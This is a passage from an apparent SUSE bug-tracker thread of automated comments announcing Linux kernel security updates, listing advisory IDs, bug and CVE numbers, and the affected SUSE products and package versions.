CVE References: CVE-2020-12770,CVE-2021-34556,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3656,CVE-2021-3679,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3753,CVE-2021-3759,CVE-2021-38160,CVE-2021-38166,CVE-2021-38198,CVE-2021-38204,CVE-2021-38205,CVE-2021-38206,CVE-2021-38207,CVE-2021-38209
JIRA References: 
Sources used:
SUSE MicroOS 5.1 (src):    kernel-default-5.3.18-59.24.1, kernel-default-base-5.3.18-59.24.1.18.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 45 Swamp Workflow Management 2021-10-13 16:30:56 UTC
SUSE-SU-2021:3415-1: An update that solves 18 vulnerabilities and has 119 fixes is now available.

Category: security (important)
Bug References: 1065729,1124431,1127650,1135481,1148868,1152489,1154353,1159886,1167032,1167773,1168202,1170774,1171420,1171688,1173746,1174003,1175543,1176447,1176940,1177028,1177399,1178134,1180141,1180347,1181006,1181972,1184114,1184439,1184611,1184804,1185302,1185550,1185675,1185677,1185726,1185762,1185898,1187211,1187455,1187591,1187619,1188067,1188172,1188270,1188412,1188418,1188439,1188616,1188651,1188694,1188700,1188878,1188924,1188983,1188985,1188986,1189153,1189225,1189257,1189262,1189297,1189301,1189399,1189400,1189503,1189504,1189505,1189506,1189507,1189562,1189563,1189564,1189565,1189566,1189567,1189568,1189569,1189573,1189574,1189575,1189576,1189577,1189579,1189581,1189582,1189583,1189585,1189586,1189587,1189696,1189706,1189760,1189762,1189832,1189841,1189870,1189872,1189883,1189884,1190022,1190023,1190025,1190062,1190115,1190117,1190131,1190138,1190159,1190181,1190358,1190406,1190412,1190413,1190428,1190467,1190523,1190534,1190543,1190544,1190561,1190576,1190595,1190596,1190598,1190620,1190626,1190679,1190705,1190717,1190746,1190758,1190784,1190785,1191172,1191193,1191292,859220
CVE References: CVE-2020-12770,CVE-2020-3702,CVE-2021-34556,CVE-2021-35477,CVE-2021-3653,CVE-2021-3656,CVE-2021-3669,CVE-2021-3732,CVE-2021-3739,CVE-2021-3743,CVE-2021-3744,CVE-2021-3752,CVE-2021-3753,CVE-2021-3759,CVE-2021-3764,CVE-2021-38160,CVE-2021-38198,CVE-2021-40490
JIRA References: 
Sources used:
SUSE MicroOS 5.1 (src):    kernel-rt-5.3.18-57.1
SUSE Linux Enterprise Module for Realtime 15-SP3 (src):    kernel-rt-5.3.18-57.1, kernel-rt_debug-5.3.18-57.1, kernel-source-rt-5.3.18-57.1, kernel-syms-rt-5.3.18-57.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 59 Swamp Workflow Management 2021-12-02 11:25:10 UTC
openSUSE-SU-2021:3876-1: An update that solves 43 vulnerabilities, contains one feature and has 26 fixes is now available.

Category: security (important)
Bug References: 1100416,1108488,1129735,1129898,1133374,1136513,1171420,1176724,1177666,1181158,1184673,1184804,1185377,1185726,1185758,1185973,1186078,1186109,1186390,1186482,1186672,1188062,1188063,1188172,1188563,1188601,1188616,1188838,1188876,1188983,1188985,1189057,1189262,1189291,1189399,1189400,1189706,1189846,1189884,1190023,1190025,1190067,1190115,1190117,1190159,1190276,1190349,1190351,1190479,1190534,1190601,1190717,1191193,1191315,1191317,1191349,1191457,1191628,1191790,1191800,1191888,1191961,1192045,1192267,1192379,1192400,1192775,1192781,1192802
CVE References: CVE-2018-13405,CVE-2018-9517,CVE-2019-3874,CVE-2019-3900,CVE-2020-0429,CVE-2020-12770,CVE-2020-3702,CVE-2020-4788,CVE-2021-0941,CVE-2021-20322,CVE-2021-22543,CVE-2021-31916,CVE-2021-33033,CVE-2021-33909,CVE-2021-34556,CVE-2021-34981,CVE-2021-3542,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3655,CVE-2021-3656,CVE-2021-3659,CVE-2021-3679,CVE-2021-3715,CVE-2021-37159,CVE-2021-3732,CVE-2021-3744,CVE-2021-3752,CVE-2021-3753,CVE-2021-37576,CVE-2021-3759,CVE-2021-3760,CVE-2021-3764,CVE-2021-3772,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-40490,CVE-2021-41864,CVE-2021-42008,CVE-2021-42252,CVE-2021-42739
JIRA References: SLE-22573
Sources used:
openSUSE Leap 15.3 (src):    kernel-debug-4.12.14-197.102.2, kernel-default-4.12.14-197.102.2, kernel-kvmsmall-4.12.14-197.102.2, kernel-vanilla-4.12.14-197.102.2, kernel-zfcpdump-4.12.14-197.102.2
Comment 60 Swamp Workflow Management 2021-12-02 11:37:23 UTC
SUSE-SU-2021:3876-1: An update that solves 43 vulnerabilities, contains one feature and has 26 fixes is now available.

Category: security (important)
Bug References: 1100416,1108488,1129735,1129898,1133374,1136513,1171420,1176724,1177666,1181158,1184673,1184804,1185377,1185726,1185758,1185973,1186078,1186109,1186390,1186482,1186672,1188062,1188063,1188172,1188563,1188601,1188616,1188838,1188876,1188983,1188985,1189057,1189262,1189291,1189399,1189400,1189706,1189846,1189884,1190023,1190025,1190067,1190115,1190117,1190159,1190276,1190349,1190351,1190479,1190534,1190601,1190717,1191193,1191315,1191317,1191349,1191457,1191628,1191790,1191800,1191888,1191961,1192045,1192267,1192379,1192400,1192775,1192781,1192802
CVE References: CVE-2018-13405,CVE-2018-9517,CVE-2019-3874,CVE-2019-3900,CVE-2020-0429,CVE-2020-12770,CVE-2020-3702,CVE-2020-4788,CVE-2021-0941,CVE-2021-20322,CVE-2021-22543,CVE-2021-31916,CVE-2021-33033,CVE-2021-33909,CVE-2021-34556,CVE-2021-34981,CVE-2021-3542,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3655,CVE-2021-3656,CVE-2021-3659,CVE-2021-3679,CVE-2021-3715,CVE-2021-37159,CVE-2021-3732,CVE-2021-3744,CVE-2021-3752,CVE-2021-3753,CVE-2021-37576,CVE-2021-3759,CVE-2021-3760,CVE-2021-3764,CVE-2021-3772,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-40490,CVE-2021-41864,CVE-2021-42008,CVE-2021-42252,CVE-2021-42739
JIRA References: SLE-22573
Sources used:
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    kernel-default-4.12.14-197.102.2, kernel-docs-4.12.14-197.102.2, kernel-obs-build-4.12.14-197.102.1, kernel-source-4.12.14-197.102.2, kernel-syms-4.12.14-197.102.2
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    kernel-default-4.12.14-197.102.2, kernel-docs-4.12.14-197.102.2, kernel-obs-build-4.12.14-197.102.1, kernel-source-4.12.14-197.102.2, kernel-syms-4.12.14-197.102.2, kernel-zfcpdump-4.12.14-197.102.2
SUSE Linux Enterprise Server 15-SP1-BCL (src):    kernel-default-4.12.14-197.102.2, kernel-docs-4.12.14-197.102.2, kernel-obs-build-4.12.14-197.102.1, kernel-source-4.12.14-197.102.2, kernel-syms-4.12.14-197.102.2
SUSE Linux Enterprise Module for Live Patching 15-SP1 (src):    kernel-default-4.12.14-197.102.2, kernel-livepatch-SLE15-SP1_Update_27-1-3.3.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    kernel-default-4.12.14-197.102.2, kernel-docs-4.12.14-197.102.2, kernel-obs-build-4.12.14-197.102.1, kernel-source-4.12.14-197.102.2, kernel-syms-4.12.14-197.102.2
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    kernel-default-4.12.14-197.102.2, kernel-docs-4.12.14-197.102.2, kernel-obs-build-4.12.14-197.102.1, kernel-source-4.12.14-197.102.2, kernel-syms-4.12.14-197.102.2
SUSE Linux Enterprise High Availability 15-SP1 (src):    kernel-default-4.12.14-197.102.2
SUSE Enterprise Storage 6 (src):    kernel-default-4.12.14-197.102.2, kernel-docs-4.12.14-197.102.2, kernel-obs-build-4.12.14-197.102.1, kernel-source-4.12.14-197.102.2, kernel-syms-4.12.14-197.102.2
SUSE CaaS Platform 4.0 (src):    kernel-default-4.12.14-197.102.2, kernel-docs-4.12.14-197.102.2, kernel-obs-build-4.12.14-197.102.1, kernel-source-4.12.14-197.102.2, kernel-syms-4.12.14-197.102.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 61 Swamp Workflow Management 2021-12-06 14:39:13 UTC
SUSE-SU-2021:3929-1: An update that solves 36 vulnerabilities and has 7 fixes is now available.

Category: security (important)
Bug References: 1068032,1087082,1098425,1100416,1119934,1129735,1171217,1171420,1173346,1176724,1183089,1184673,1186109,1186390,1188172,1188325,1188563,1188601,1188838,1188876,1188983,1188985,1189057,1189262,1189291,1189399,1189706,1190023,1190025,1190067,1190117,1190159,1190276,1190349,1190351,1190601,1191193,1191315,1191790,1191958,1191961,1192781,802154
CVE References: CVE-2017-5753,CVE-2018-13405,CVE-2018-16882,CVE-2020-0429,CVE-2020-12655,CVE-2020-14305,CVE-2020-3702,CVE-2021-20265,CVE-2021-20322,CVE-2021-31916,CVE-2021-33033,CVE-2021-34556,CVE-2021-34981,CVE-2021-3542,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3655,CVE-2021-3659,CVE-2021-3679,CVE-2021-3715,CVE-2021-37159,CVE-2021-3732,CVE-2021-3752,CVE-2021-3753,CVE-2021-37576,CVE-2021-3760,CVE-2021-3772,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-3896,CVE-2021-40490,CVE-2021-42008,CVE-2021-42739,CVE-2021-43389
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 12-SP2-BCL (src):    kernel-default-4.4.121-92.161.1, kernel-source-4.4.121-92.161.1, kernel-syms-4.4.121-92.161.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 62 Swamp Workflow Management 2021-12-06 18:16:58 UTC
SUSE-SU-2021:3935-1: An update that solves 38 vulnerabilities and has 18 fixes is now available.

Category: security (important)
Bug References: 1073928,1098425,1100416,1119934,1129735,1171217,1171420,1173346,1176724,1177666,1181158,1181854,1181855,1183089,1184673,1185726,1185727,1185758,1185973,1186109,1186390,1188172,1188563,1188601,1188838,1188876,1188983,1188985,1189057,1189262,1189278,1189291,1189399,1189420,1189706,1190022,1190023,1190025,1190067,1190117,1190159,1190194,1190349,1190351,1190601,1190717,1191193,1191315,1191790,1191801,1191958,1191961,1192267,1192400,1192775,1192781
CVE References: CVE-2017-17862,CVE-2017-17864,CVE-2018-13405,CVE-2018-16882,CVE-2020-0429,CVE-2020-12655,CVE-2020-14305,CVE-2020-3702,CVE-2020-4788,CVE-2021-20265,CVE-2021-20322,CVE-2021-31916,CVE-2021-33033,CVE-2021-34556,CVE-2021-34981,CVE-2021-3542,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3655,CVE-2021-3659,CVE-2021-3679,CVE-2021-3715,CVE-2021-37159,CVE-2021-3732,CVE-2021-3752,CVE-2021-3753,CVE-2021-37576,CVE-2021-3760,CVE-2021-3772,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-3896,CVE-2021-40490,CVE-2021-42008,CVE-2021-42739,CVE-2021-43389
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 8 (src):    kernel-default-4.4.180-94.150.1, kernel-source-4.4.180-94.150.1, kernel-syms-4.4.180-94.150.1, kgraft-patch-SLE12-SP3_Update_41-1-4.3.1
SUSE OpenStack Cloud 8 (src):    kernel-default-4.4.180-94.150.1, kernel-source-4.4.180-94.150.1, kernel-syms-4.4.180-94.150.1, kgraft-patch-SLE12-SP3_Update_41-1-4.3.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    kernel-default-4.4.180-94.150.1, kernel-source-4.4.180-94.150.1, kernel-syms-4.4.180-94.150.1, kgraft-patch-SLE12-SP3_Update_41-1-4.3.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    kernel-default-4.4.180-94.150.1, kernel-source-4.4.180-94.150.1, kernel-syms-4.4.180-94.150.1, kgraft-patch-SLE12-SP3_Update_41-1-4.3.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    kernel-default-4.4.180-94.150.1, kernel-source-4.4.180-94.150.1, kernel-syms-4.4.180-94.150.1
SUSE Linux Enterprise High Availability 12-SP3 (src):    kernel-default-4.4.180-94.150.1
HPE Helion Openstack 8 (src):    kernel-default-4.4.180-94.150.1, kernel-source-4.4.180-94.150.1, kernel-syms-4.4.180-94.150.1, kgraft-patch-SLE12-SP3_Update_41-1-4.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 63 Swamp Workflow Management 2021-12-07 20:25:25 UTC
SUSE-SU-2021:3969-1: An update that solves 37 vulnerabilities and has 21 fixes is now available.

Category: security (important)
Bug References: 1085235,1085308,1087078,1087082,1100394,1102640,1105412,1108488,1129898,1133374,1171420,1173489,1174161,1181854,1184804,1185377,1185726,1185758,1186109,1186482,1188172,1188563,1188601,1188838,1188876,1188983,1188985,1189057,1189262,1189291,1189399,1189400,1189706,1189846,1189884,1190023,1190025,1190067,1190117,1190159,1190351,1190479,1190534,1190601,1190717,1191193,1191315,1191317,1191790,1191800,1191961,1192045,1192267,1192379,1192400,1192775,1192781,1192802
CVE References: CVE-2018-3639,CVE-2018-9517,CVE-2019-3874,CVE-2019-3900,CVE-2020-12770,CVE-2020-3702,CVE-2021-0941,CVE-2021-20320,CVE-2021-20322,CVE-2021-22543,CVE-2021-31916,CVE-2021-33033,CVE-2021-34556,CVE-2021-34981,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3655,CVE-2021-3656,CVE-2021-3659,CVE-2021-3679,CVE-2021-37159,CVE-2021-3732,CVE-2021-3744,CVE-2021-3752,CVE-2021-3753,CVE-2021-37576,CVE-2021-3760,CVE-2021-3764,CVE-2021-3772,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-40490,CVE-2021-41864,CVE-2021-42008,CVE-2021-42252
JIRA References: 
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    kernel-default-4.12.14-150.78.1, kernel-docs-4.12.14-150.78.2, kernel-obs-build-4.12.14-150.78.2, kernel-source-4.12.14-150.78.1, kernel-syms-4.12.14-150.78.1, kernel-vanilla-4.12.14-150.78.1
SUSE Linux Enterprise Server 15-LTSS (src):    kernel-default-4.12.14-150.78.1, kernel-docs-4.12.14-150.78.2, kernel-obs-build-4.12.14-150.78.2, kernel-source-4.12.14-150.78.1, kernel-syms-4.12.14-150.78.1, kernel-vanilla-4.12.14-150.78.1, kernel-zfcpdump-4.12.14-150.78.1
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-default-4.12.14-150.78.1, kernel-livepatch-SLE15_Update_26-1-1.3.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    kernel-default-4.12.14-150.78.1, kernel-docs-4.12.14-150.78.2, kernel-obs-build-4.12.14-150.78.2, kernel-source-4.12.14-150.78.1, kernel-syms-4.12.14-150.78.1, kernel-vanilla-4.12.14-150.78.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    kernel-default-4.12.14-150.78.1, kernel-docs-4.12.14-150.78.2, kernel-obs-build-4.12.14-150.78.2, kernel-source-4.12.14-150.78.1, kernel-syms-4.12.14-150.78.1, kernel-vanilla-4.12.14-150.78.1
SUSE Linux Enterprise High Availability 15 (src):    kernel-default-4.12.14-150.78.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 64 Swamp Workflow Management 2021-12-08 14:24:25 UTC
SUSE-SU-2021:3972-1: An update that solves 40 vulnerabilities and has 47 fixes is now available.

Category: security (important)
Bug References: 1087082,1100416,1108488,1129735,1129898,1133374,1153720,1171420,1176724,1176931,1180624,1181854,1181855,1183050,1183861,1184673,1184804,1185377,1185677,1185726,1185727,1185758,1185973,1186063,1186482,1186483,1186672,1188026,1188172,1188563,1188601,1188613,1188838,1188842,1188876,1188983,1188985,1189057,1189262,1189278,1189291,1189399,1189400,1189418,1189420,1189706,1189846,1189884,1190023,1190025,1190067,1190115,1190117,1190118,1190159,1190276,1190349,1190350,1190351,1190432,1190479,1190534,1190601,1190717,1191193,1191315,1191317,1191318,1191529,1191530,1191628,1191660,1191790,1191801,1191813,1191961,1192036,1192045,1192048,1192267,1192379,1192400,1192444,1192549,1192775,1192781,1192802
CVE References: CVE-2018-13405,CVE-2018-9517,CVE-2019-3874,CVE-2019-3900,CVE-2020-0429,CVE-2020-12770,CVE-2020-3702,CVE-2021-0941,CVE-2021-20322,CVE-2021-22543,CVE-2021-31916,CVE-2021-34556,CVE-2021-34981,CVE-2021-3542,CVE-2021-35477,CVE-2021-3640,CVE-2021-3653,CVE-2021-3655,CVE-2021-3656,CVE-2021-3659,CVE-2021-3679,CVE-2021-3715,CVE-2021-37159,CVE-2021-3732,CVE-2021-3744,CVE-2021-3752,CVE-2021-3753,CVE-2021-37576,CVE-2021-3759,CVE-2021-3760,CVE-2021-3764,CVE-2021-3772,CVE-2021-38160,CVE-2021-38198,CVE-2021-38204,CVE-2021-40490,CVE-2021-41864,CVE-2021-42008,CVE-2021-42252,CVE-2021-42739
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    kernel-default-4.12.14-95.83.2, kernel-source-4.12.14-95.83.2, kernel-syms-4.12.14-95.83.2
SUSE OpenStack Cloud 9 (src):    kernel-default-4.12.14-95.83.2, kernel-source-4.12.14-95.83.2, kernel-syms-4.12.14-95.83.2
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    kernel-default-4.12.14-95.83.2, kernel-source-4.12.14-95.83.2, kernel-syms-4.12.14-95.83.2
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    kernel-default-4.12.14-95.83.2, kernel-source-4.12.14-95.83.2, kernel-syms-4.12.14-95.83.2
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kernel-default-4.12.14-95.83.2, kgraft-patch-SLE12-SP4_Update_23-1-6.3.1
SUSE Linux Enterprise High Availability 12-SP4 (src):    kernel-default-4.12.14-95.83.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 68 Swamp Workflow Management 2022-03-08 23:50:17 UTC
SUSE-SU-2022:14905-1: An update that solves 10 vulnerabilities and has three fixes is now available.

Category: security (important)
Bug References: 1171420,1179599,1190025,1191580,1193157,1193669,1193867,1194272,1195109,1195543,1195908,1196079,1196612
CVE References: CVE-2019-0136,CVE-2020-12770,CVE-2020-27820,CVE-2021-3753,CVE-2021-4155,CVE-2021-45095,CVE-2022-0001,CVE-2022-0002,CVE-2022-0492,CVE-2022-0617
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    kernel-bigmem-3.0.101-108.135.1, kernel-default-3.0.101-108.135.1, kernel-ec2-3.0.101-108.135.1, kernel-pae-3.0.101-108.135.1, kernel-ppc64-3.0.101-108.135.1, kernel-source-3.0.101-108.135.1, kernel-syms-3.0.101-108.135.1, kernel-trace-3.0.101-108.135.1, kernel-xen-3.0.101-108.135.1
SUSE Linux Enterprise Server 11-EXTRA (src):    kernel-default-3.0.101-108.135.1, kernel-pae-3.0.101-108.135.1, kernel-ppc64-3.0.101-108.135.1, kernel-trace-3.0.101-108.135.1, kernel-xen-3.0.101-108.135.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    kernel-bigmem-3.0.101-108.135.1, kernel-default-3.0.101-108.135.1, kernel-ec2-3.0.101-108.135.1, kernel-pae-3.0.101-108.135.1, kernel-ppc64-3.0.101-108.135.1, kernel-trace-3.0.101-108.135.1, kernel-xen-3.0.101-108.135.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.